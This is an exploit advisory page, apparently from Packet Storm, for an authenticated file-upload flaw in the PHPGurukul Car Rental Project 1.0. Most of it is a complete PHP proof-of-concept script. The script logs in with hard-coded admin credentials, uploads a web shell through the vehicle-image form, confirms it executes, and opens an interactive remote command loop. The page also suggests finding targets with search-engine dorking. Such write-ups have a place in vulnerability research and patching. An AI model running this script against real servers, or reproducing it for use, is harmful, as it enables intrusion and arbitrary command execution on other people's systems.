## https://sploitus.com/exploit?id=PACKETSTORM:181761
=============================================================================================================================================  
| # Title : Car Rental Project 1.0 PHP Code Injection Vulnerability (authenticated arbitrary file upload leading to RCE) |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://phpgurukul.com/car-rental-project-php-mysql-free-download/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.  
  
[+] This PoC logs in to admin/index.php with the credentials hard-coded in the script (admin / Test@12345), uploads a PHP web shell through the vehicle-image form on admin/changeimage1.php, and then runs operating-system commands through it via ?cmd=. Valid admin credentials are therefore a precondition; the underlying weakness is that the image upload accepts and serves a .php file.  
  
[+] Save the payload below as poc.php (requires the PHP CLI with the curl extension).  
  
[+] usage : C:\www\test>php poc.php 127.0.0.1  
  
[+] payload :   
  
<?php

// Start-up banner.  The leading and trailing "\n" keep the box separated from
// the surrounding terminal output, exactly as the original string did.
$banner = [
    '+-------------------------------------------------------------+',
    'Car Rental Project v1.0 - php Code injection',
    '',
    'by indoushka',
    '+-------------------------------------------------------------+',
];
echo "\n" . implode("\n", $banner) . "\n";
  
// Function to log in and execute RCE  
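// Authenticate to the admin panel, upload a PHP web shell through the vehicle
// image form and drop into an interactive command loop that runs through it.
//
// Flow: POST credentials to admin/index.php -> multipart POST of the shell to
// admin/changeimage1.php -> GET admin/img/vehicleimages/<shell>?cmd=... per
// command.  The install path is hard-coded, as in the original PoC.
//
// @param string      $rhosts   Target host (optionally host:port).
// @param string      $username Admin username; defaults to the value the
//                              original PoC hard-coded.
// @param string      $password Admin password; same default as the original.
// @param string|null $proxy    Optional proxy URL, e.g. "http://127.0.0.1:8080"
//                              to watch the traffic in Burp (the original left
//                              this as an unused array).
// @return void  Terminates the process with exit code 1 when a step fails.
function login(string $rhosts, string $username = 'admin', string $password = 'Test@12345', ?string $proxy = null): void {
    $base = "http://" . $rhosts . "/carrentalproject/carrental/admin";
    $post_auth_login = $base . "/index.php";
    $shell_upload_url = $base . "/changeimage1.php";
    $shell_name = '1dccadfed7bcbb036c56a4afb97e906f.php';
    // NOTE(review): assumes the server stores the upload under the posted
    // filename, as the original PoC did; if it renames uploads, adjust this.
    $shell_location = $base . "/img/vehicleimages/" . $shell_name;
    $bigstring = "\n+-------------------------------------------------------------+\n";

    echo "+-------------------------------------------------------------+\n";
    echo "[+] Victim host: " . $rhosts . "\n";

    $session = curl_init();
    // CURLOPT_COOKIEFILE turns on curl's cookie engine for this handle (an
    // empty string loads nothing from disk), so the session cookie issued at
    // login is replayed on the upload and command requests.  Nothing is
    // written to disk -- that would need CURLOPT_COOKIEJAR, which the original
    // comment "Store cookies in a file" confused it with.  Timeouts stop the
    // PoC from hanging on a filtered port.
    curl_setopt_array($session, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE     => '',
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
    ]);
    if ($proxy !== null) {
        curl_setopt($session, CURLOPT_PROXY, $proxy);
    }

    // ---- Step 1: log in ------------------------------------------------------
    curl_setopt($session, CURLOPT_URL, $post_auth_login);
    curl_setopt($session, CURLOPT_POST, true);
    curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query([
        'username' => $username,
        'password' => $password,
        'login'    => '',
    ]));
    $login_response = curl_exec($session);
    $http_code = curl_getinfo($session, CURLINFO_HTTP_CODE);
    // A transport failure leaves the code at 0.  2xx and 3xx are both
    // accepted because a login form commonly redirects on success.
    // NOTE(review): this only proves the endpoint answered -- a re-rendered
    // login form is also a 200.  Real success is established by the shell
    // probe in step 3.
    if ($login_response === false || $http_code < 200 || $http_code >= 400) {
        echo "[!] Failed to authenticate (HTTP " . $http_code . " " . curl_error($session) . ")\n";
        curl_close($session);
        exit(1);
    }
    echo "[+] Login HTTP response code: " . $http_code . "\n";
    echo "[+] Successfully logged in\n";

    // ---- Step 2: upload the web shell ----------------------------------------
    // CURLFile's first argument is a *local path* curl must be able to read
    // and the third is the filename sent to the server.  The original PoC
    // passed the PHP payload as the third argument, so curl had nothing to
    // read and the request never carried the shell.  Write the payload to a
    // temp file and send it under the intended name instead.
    $payload = '<?php system($_GET["cmd"]); ?>';
    $tmp = tempnam(sys_get_temp_dir(), 'poc');
    if ($tmp === false || file_put_contents($tmp, $payload) === false) {
        echo "[!] Could not write the payload to a temporary file\n";
        curl_close($session);
        exit(1);
    }
    curl_setopt($session, CURLOPT_URL, $shell_upload_url);
    curl_setopt($session, CURLOPT_POST, true);
    curl_setopt($session, CURLOPT_POSTFIELDS, [
        'img1'   => new CURLFile($tmp, 'application/x-php', $shell_name),
        'update' => '',
    ]);
    $upload_response = curl_exec($session);
    $upload_error = curl_error($session);
    unlink($tmp);
    if ($upload_response === false) {
        echo "[!] Failed to upload backdoor: " . $upload_error . "\n";
        curl_close($session);
        exit(1);
    }

    // ---- Step 3: confirm the shell executes, then loop -----------------------
    // Switch the handle back to GET.  CURLOPT_POST stays set on a reused
    // handle, so the original loop re-sent the multipart upload body with
    // every command.
    curl_setopt($session, CURLOPT_HTTPGET, true);
    // A truthy $upload_response only shows the upload endpoint returned a body.
    // Echoing a random token through the shell proves the file landed where
    // expected and is executed as PHP.
    $token = bin2hex(random_bytes(8));
    curl_setopt($session, CURLOPT_URL, $shell_location . '?cmd=' . urlencode('echo ' . $token));
    $probe = curl_exec($session);
    if ($probe === false || strpos($probe, $token) === false) {
        echo "[!] Shell not executing at " . $shell_location
            . " (HTTP " . curl_getinfo($session, CURLINFO_HTTP_CODE) . ")\n";
        curl_close($session);
        exit(1);
    }
    echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/" . $shell_name . $bigstring;

    while (true) {
        echo "Command RCE >> ";
        $line = fgets(STDIN);
        // fgets() returns false at EOF (closed pipe, Ctrl-D/Ctrl-Z); the
        // original loop spun forever sending empty commands in that case.
        if ($line === false) {
            break;
        }
        $command = trim($line);
        if ($command === '') {
            continue;
        }
        // Local escape hatch; sending "exit" to a stateless web shell does nothing.
        if ($command === 'exit' || $command === 'quit') {
            break;
        }
        curl_setopt($session, CURLOPT_URL, $shell_location . '?cmd=' . urlencode($command));
        $response = curl_exec($session);
        echo ($response === false ? "[!] " . curl_error($session) : $response) . "\n";
    }

    // Reachable now that the loop can end; the original never got here.
    curl_close($session);
}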
  
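// CLI entry point: the single argument is the target host (host[:port]).
// The usage line names the script as it was actually invoked (the original
// hard-coded "script.php" while the write-up says poc.php), and misuse exits
// non-zero so the PoC can be driven from other scripts.
if ($argc < 2) {
    echo "Usage: php " . basename($argv[0]) . " [target_host]\n";
    exit(1);
}

login($argv[1]);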
  
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================